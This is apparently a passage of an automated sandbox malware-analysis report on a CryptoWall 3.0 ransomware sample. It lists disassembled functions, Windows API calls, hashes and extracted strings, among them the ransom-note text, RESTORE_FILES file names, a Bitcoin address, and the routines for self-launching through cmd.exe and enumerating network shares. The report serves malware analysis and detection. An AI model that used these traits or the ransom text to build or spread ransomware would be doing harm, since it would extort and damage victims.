                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction ID: 9b151dc2d0a7d3be963eb5d747ef86db4f4cbe53b6bb54432aefd0192dcc4281
                                                                                                                            • Opcode Fuzzy Hash: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction Fuzzy Hash: 8D311C31A052219EDB15BB79BC087567FE9EF48770B58253BE610922B0DB789441CF9C
                                                                                                                            Function 0041D210 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 99sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041D231
                                                                                                                            • _memset.LIBCMT ref: 0041D244
                                                                                                                            • _memset.LIBCMT ref: 0041D257
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041D270
                                                                                                                              • Part of subcall function 0041D1A0: _vsnwprintf.NTDLL ref: 0041D1CF
                                                                                                                            • _memset.LIBCMT ref: 0041D2E2
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0041D337
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D350
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041D35E
                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0041D367
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041D376
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                                                                                                                            • String ID: /c start "" "%s"$%s\system32\cmd.exe$<$@$DfC$windir
                                                                                                                            • API String ID: 3370961082-4193238480
                                                                                                                            • Opcode ID: f2a34d7a4750ee32f4e6a2d65ecff6902c3b24ff8586a7ff68a1e64aa6f790ce
                                                                                                                            • Instruction ID: 9fd5859a90402e78b6874ceda3f8e209096e6d3a03dae52f113e5a618079a305
                                                                                                                            • Opcode Fuzzy Hash: f2a34d7a4750ee32f4e6a2d65ecff6902c3b24ff8586a7ff68a1e64aa6f790ce
                                                                                                                            • Instruction Fuzzy Hash: 5A31A5F1E0021CA6DB20DB55DC45FDA73B8EB48704F4085AAE648E6181DB799AC4CFED
                                                                                                                            Function 0041DC60 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 113fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DC8E
                                                                                                                            • CreateFileW.KERNEL32 ref: 0041DCEA
                                                                                                                            • WriteFile.KERNEL32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,00000000,00000000), ref: 0041DD24
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041DD2D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DD30
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041DD83
                                                                                                                            • WriteFile.KERNEL32(00000000,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family,?,00000000), ref: 0041DDB1
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,756F3475,?,0041DAE7), ref: 0041DDB4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DDB7
                                                                                                                            Strings
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DCAE
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041DD90, 0041DDAA, 0041DDAB
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041DCFB, 0041DD1D, 0041DD1E
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DD51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersCloseCreateFlushHandleWrite$_memset
                                                                                                                            • String ID: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h
                                                                                                                            • API String ID: 914705027-830276283
                                                                                                                            • Opcode ID: 3b3c340cbc9ac2301daebd752383baa2d4edab66324f286cc814a19664725b5c
                                                                                                                            • Instruction ID: 96bf19131e14ac19f3527533158f27ed193ecad63d9d7319e44fd025a00123c3
                                                                                                                            • Opcode Fuzzy Hash: 3b3c340cbc9ac2301daebd752383baa2d4edab66324f286cc814a19664725b5c
                                                                                                                            • Instruction Fuzzy Hash: E6312B756403147AF724AB649C8AFEA7338DF09704F504195F744AB1D2DBB86E44C7AC
                                                                                                                            Function 0041E3F0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041E300: GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                              • Part of subcall function 0041E300: SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                              • Part of subcall function 0041E300: SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                              • Part of subcall function 0041E300: DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                              • Part of subcall function 0041E300: ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                              • Part of subcall function 0041E300: DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E4A2
                                                                                                                            • GetDIBits.GDI32 ref: 0041E4DB
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E4E4
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0041E522
                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 0041E53E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 0041E55B
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E573
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041E57A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E581
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041E595
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Object$CreateDeleteWrite$CompatibleReleaseSelect$BitmapBitsBuffersCloseColorFlushHandleModeText
                                                                                                                            • String ID: ($6
                                                                                                                            • API String ID: 666674223-4149066357
                                                                                                                            • Opcode ID: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction ID: 06a2a779e1feef08f14fc2e11d98cd6d7394d97c17aae2770a884c198b9b7a13
                                                                                                                            • Opcode Fuzzy Hash: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction Fuzzy Hash: F6414D71618340ABD310DFA4DD45B9FB7F8EFC9704F004A1EF68596290E7B499448BAB
                                                                                                                            Function 00401270 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 415COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004010A0: std::exception::exception.LIBCMT ref: 00401116
                                                                                                                              • Part of subcall function 004010A0: __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401514
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040152F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401573
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401588
                                                                                                                            • std::exception::exception.LIBCMT ref: 0040171A
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040172F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401777
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040178C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: failed$4C$4C
                                                                                                                            • API String ID: 3728558374-858053814
                                                                                                                            • Opcode ID: 393e3938ad8d577eef796852533f210f20ebc65d2980a22acf3593617c1e2b87
                                                                                                                            • Instruction ID: 36413a6523f9bf71e860ab9fa8cf4e802c959e55f4098fbd293934a26d275bda
                                                                                                                            • Opcode Fuzzy Hash: 393e3938ad8d577eef796852533f210f20ebc65d2980a22acf3593617c1e2b87
                                                                                                                            • Instruction Fuzzy Hash: 0A029E70D002689BDB21CFA5CC80BDEBBB4BF59304F1485ABE405BB281D7B95A85CF95
                                                                                                                            Function 0041E300 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E280: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                              • Part of subcall function 0041E280: GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                              • Part of subcall function 0041E280: DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            • SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                                                                                                                            • String ID: u4ou
                                                                                                                            • API String ID: 1917954226-2630692901
                                                                                                                            • Opcode ID: f124cd0ff04e5fbfd8231640472e7df28b59e43af88ab7b38344bb04a31b8380
                                                                                                                            • Instruction ID: 7b1e2fc2d7beb835fd261bede12d122ca37f61ea03320d98644ec2963549b2db
                                                                                                                            • Opcode Fuzzy Hash: f124cd0ff04e5fbfd8231640472e7df28b59e43af88ab7b38344bb04a31b8380
                                                                                                                            • Instruction Fuzzy Hash: 94216075D00209ABDB009FEA9D886EFFBB8FF49311F10527AF905A3660DB7449858B94
                                                                                                                            Function 00402030 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 449COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040210C
                                                                                                                            • _memset.LIBCMT ref: 00402126
                                                                                                                            • _free.LIBCMT ref: 0040237B
                                                                                                                            • _memset.LIBCMT ref: 00402448
                                                                                                                              • Part of subcall function 0041B9A0: _memmove.LIBCMT ref: 0041B9DF
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAA8
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAD1
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BB24
                                                                                                                              • Part of subcall function 0041F020: _memset.LIBCMT ref: 0041F047
                                                                                                                              • Part of subcall function 00402740: memmove.NTDLL(?,00000000,?,0040253A), ref: 00402773
                                                                                                                            • _memmove.LIBCMT ref: 00402573
                                                                                                                            • __time64.LIBCMT ref: 00402580
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 004022E4
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00402370
                                                                                                                            • 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB, xrefs: 0040256E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove$__time64_freememmove
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 2817571782-161570552
                                                                                                                            • Opcode ID: f6b00c6a2980c6208534005260397c9b22fa4c23e7baa0cca0850e16493b7354
                                                                                                                            • Instruction ID: 4aa5ae40cc9d391a8dbd0e541590addac9a07c332d60b5f638ed022fa75e1140
                                                                                                                            • Opcode Fuzzy Hash: f6b00c6a2980c6208534005260397c9b22fa4c23e7baa0cca0850e16493b7354
                                                                                                                            • Instruction Fuzzy Hash: CBF1F1B15083809BC320EF65DC81A9BB7E4AFD8308F04493EF58967381E7799945CB9B
                                                                                                                            Function 0041E280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                            • DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                            • DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            Strings
                                                                                                                            • Tahoma, xrefs: 0041E281
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041E2BB, 0041E2D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$DrawSelectText$CreateDeleteFontStock
                                                                                                                            • String ID: Tahoma$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h
                                                                                                                            • API String ID: 176621763-1021506374
                                                                                                                            • Opcode ID: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction ID: 007f58ff4962ad56c78a0c5f32a044bb907f91f90d0d163fefc4750496c2c755
                                                                                                                            • Opcode Fuzzy Hash: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction Fuzzy Hash: 9CF01D703C4300BBF6201BA09C8FF6B3A68EB0AF51F301119B312BC1E1C6E464455A2D
                                                                                                                            Function 00413670 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryshareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,T9A,T9A), ref: 00413692
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000,00000000), ref: 004136AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocEnumGlobalOpen
                                                                                                                            • String ID: T9A
                                                                                                                            • API String ID: 3336353811-2611717058
                                                                                                                            • Opcode ID: 0a98321caf750293ecd154e3b48eea01ba96f44a2e89559002fe1efbabe4bb41
                                                                                                                            • Instruction ID: 6d7f72055025c7b0be6fe11486413a1798db894e983857bc46ed2fd87d8a8497
                                                                                                                            • Opcode Fuzzy Hash: 0a98321caf750293ecd154e3b48eea01ba96f44a2e89559002fe1efbabe4bb41
                                                                                                                            • Instruction Fuzzy Hash: 1731C7F2900204BBEB20DF94DC45BEBB76CEB55311F10426AE904A7380D6755F85CB98
                                                                                                                            Function 0041E050 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
